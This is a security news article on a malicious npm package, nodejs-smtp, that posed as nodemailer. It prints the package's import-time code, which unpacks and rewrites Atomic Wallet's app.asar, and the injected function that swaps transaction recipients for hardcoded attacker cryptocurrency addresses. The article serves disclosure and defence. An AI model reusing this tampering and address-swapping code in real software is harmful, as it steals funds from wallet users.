Malicious npm Package Mimics Popular Nodemailer (3.9 Million Weekly Downloads) to Hijack Crypto Transactions


Security researchers at Socket.dev uncovered a supply chain attack in late August 2025 built around a malicious npm package named nodejs-smtp, which masquerades as nodemailer, the widely used email library that sees approximately 3.9 million weekly downloads.

At first glance, nodejs-smtp operates identically to its legitimate counterpart, supplying a familiar API and successfully dispatching emails.

This working facade serves as a Trojan horse: behind it, the package quietly targets desktop cryptocurrency wallets installed on Windows systems.


Malicious package (Source – Socket.dev)

As organizations integrate ever more open-source dependencies into their development pipelines, attackers have recognized the potency of import-time tampering: code that runs the moment a module is required, before any of its exported functions are called.

Socket.dev analysts noted that upon import, nodejs-smtp immediately runs a payload that tampers with Electron-based wallet applications such as Atomic Wallet and Exodus.

By unpacking the wallet’s app.asar archive, replacing a critical vendor bundle with malicious code, and then repackaging the archive, the attacker ensures persistence and stealth.

Following this manipulation, any transaction initiated by the compromised wallet is rerouted, substituting the intended recipient address with one controlled by the threat actor.

Socket.dev analysts further identified that the threat actor, operating under the npm alias nikotimon, embeds hardcoded wallet addresses directly into the injected payload.

These addresses include Bitcoin, Ethereum, Tether (both ERC-20 and TRC-20), XRP, and Solana, facilitating multichain theft.

Although initial download counts for nodejs-smtp were relatively low—approximately 342 at the time of discovery—the potential for widespread compromise remains high given nodemailer’s ubiquity in production environments.

In light of these findings, developers and security teams are urged to adopt rigorous supply chain defenses.

Recommended measures include real-time analysis of side-effect imports, strict enforcement of code-review policies for new dependencies, and deployment of automated tooling to flag archive-manipulation patterns during package installation.

The risk is amplified by the fact that build pipelines and continuous integration systems are unlikely to detect such tampering when dependencies appear functionally correct.

Infection Mechanism and Persistence Tactics

Delving deeper into nodejs-smtp’s infection strategy reveals a two-stage process that exploits Electron’s packaging format.

In the first stage, the package’s lib/engine/index.js script executes immediately upon import:

// lib/engine/index.js (as reported; comments added for analysis)
const os = require('os');
const fs = require('fs').promises;
const path = require('path');
const asar = require('asar');   // Electron's archive tooling, pulled in by the package

async function patchAtomic() {
  try {
    // Atomic Wallet's per-user install location on Windows
    const base    = path.join(os.homedir(), 'AppData', 'Local', 'Programs');
    const resDir  = path.join(base, 'atomic', 'resources');
    const asarIn  = path.join(resDir, 'app.asar');      // the wallet's packaged app code
    const workDir = path.join(resDir, 'output');         // scratch directory for the unpacked tree
    const implant = path.join(__dirname, 'a.js');        // payload shipped inside the npm package
    const target  = path.join(workDir, 'dist', 'electron', 'vendors.64b69c3b00e2a7914733.js');

    await fs.mkdir(workDir, { recursive: true });
    asar.extractAll(asarIn, workDir);                    // unpack app.asar
    await fs.copyFile(implant, target);                  // overwrite the vendor bundle with a.js
    asar.createPackage(workDir, asarIn);                 // repack over the original archive
    await fs.rm(workDir, { recursive: true, force: true }); // remove the scratch tree
  } catch {}                                             // swallow every error so the host app never notices
}

patchAtomic();   // runs at module load, i.e. on require('nodejs-smtp')

This routine unpacks the wallet archive, overwrites the vendor bundle with the malicious payload a.js, and repackages the archive so the wallet keeps launching normally and nothing looks amiss on disk.

Upon the next wallet launch, a.js intercepts transaction construction and replaces the recipient address, ensuring every outgoing payment is diverted:

// lib/engine/a.js (excerpt of a method inside the injected vendor bundle; comments added for analysis)
async sendCoins() {
  // Runs only once the user has entered a valid wallet password, i.e. at the point
  // where a legitimate transaction is about to be built.
  if (await this.validatePassword()) {
    // The recipient the user typed is silently replaced with an attacker-controlled address,
    // chosen per asset ticker.
    if (this.coin.ticker === 'BTC')
      this.inputs.address = "17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy";
    else if (this.coin.ticker === 'ETH' || this.coin.ticker === 'USDT')
      this.inputs.address = "0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24";
    // Additional mappings for TRX-USDT, XRP, SOL omitted
  }
}

By executing during import, nodejs-smtp sidesteps tooling that only examines what a package does when its exported functions are called at runtime; the implant is planted before the host application ever sends an email. This import-time hook highlights the evolving threat landscape within open-source ecosystems and underscores the need for supply chain–aware security measures.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.